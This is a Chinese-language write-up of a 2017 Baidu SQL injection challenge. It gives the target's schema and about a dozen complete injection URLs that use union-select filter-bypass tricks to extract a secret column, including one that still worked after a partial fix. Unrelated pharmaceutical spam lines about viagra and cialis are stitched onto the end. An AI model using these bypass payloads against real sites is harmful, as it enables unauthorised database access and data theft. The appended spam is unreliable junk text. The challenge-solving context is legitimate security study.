百度2017年5月SQL注入挑战赛
1.基础信息收集
库名security_btest
版本5.5.54-0+deb8u1
表名books_btest_BFE2
字段id_8994,author_6C61,title_19D0,price_77BC,secret_E295
获取表名
http://sqlitest.anquanbao.com.cn/api/query?art_id=2 /*!union*/select!1,{0a (select/**/GROUP_CONCAT(TABLE_NAME)/**//**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA/**/in('security_btest'))},!2
获取字段名
http://sqlitest.anquanbao.com.cn/api/query?art_id=2%20/*!union*/select!1,%7B0a%20(select/**/GROUP_CONCAT(COLUMN_NAME)/**//**/from/**/information_schema.CoLUMNS/**/where/**/CoLUMNS.TABLE_name/**/in(%27books_btest_BFE2%27))%7D,!2
2.Bypass
2.1 利用字段null+花括号{} 绕过字段拦截
http://sqlitest.anquanbao.com.cn/api/query?art_id=33 union select not null,{0a (select secret_E295 from books_btest_BFE2 limit 1)},null
2.2 利用@符号绕过字段限制
http://sqlitest.anquanbao.com.cn/api/query?art_id=2 /*!union*/select@1,(select secret_E295 from books_btest_BFE2 limit 1),2
2.3 利用感叹号绕过字段限制
http://sqlitest.anquanbao.com.cn/api/query?art_id=2 /*!union*/select!1,{0a (select secret_E295 from books_btest_BFE2 limit 1)},!2
2.4 利用科学计数绕过union
http://sqlitest.anquanbao.com.cn/api/query?art_id=2e1union select 1,(select secret_E295 from books_btest_BFE2 limit 1),3
2.5 利用百分号绕过
http://sqlitest.anquanbao.com.cn/api/query?art_id=-1 union select secret_E295,2,3 from books_btest_BFE2 where 1 or '%' limit 1
2.6 这个payload怎么过的我也有点懵逼...
http://sqlitest.anquanbao.com.cn/api/query?art_id=2 union select secret_E295,0 between null and 2,-2 from books_btest_BFE2
2.7 利用浮点数绕过union限制,注意0. xx后面不用写数字。
http://sqlitest.anquanbao.com.cn/api/query?art_id=0.union select 1,(select secret_E295 from books_btest_BFE2 limit 1),3
2.8 利用符号绕过字段限制。
http://sqlitest.anquanbao.com.cn/api/query?art_id=1 union select 1,'\/',(select secret_E295 from books_btest_BFE2 limit 1)
2.9 利用as+引号绕过字段限制。
http://sqlitest.anquanbao.com.cn/api/query?art_id=1 union select (1)"a",(select secret_E295 from books_btest_BFE2 limit 1),2
2.10 union跟前面的数字连接的时候,字段就没有限制了。
http://sqlitest.anquanbao.com.cn/api/query?art_id=1%2b{0a 1}union select 1,(select secret_E295 from books_btest_BFE2 limit 1),2
------------- 修复后 ------------
2.11 抽空再看了下你们,发现修复了部分payload,比如之前给你们提交的单次感叹号,用双感叹号可以绕过。
http://sqlitest.anquanbao.com.cn/api/query?art_id=2 union select!!1,2,(select group_concat(secret_E295) from books_btest_BFE2)
3. 总结
可能百度那边准备不充分,感觉出现了很多非预期的payload。
levitra effect starts working within - levitra announcements - levitra side effects last active
cialis information viagra vs cialis latest news and updates - cialis for women cancer contact u[...]
viagra 20mg canada display topics from previous - boots viagra - viagra harder
cialis and alcohol you cannot post new topics in this forum - natural ed remedies - ordering ci[...]
viagra online prescription instant messaging - e-cig viagra review - soft viagra 10mg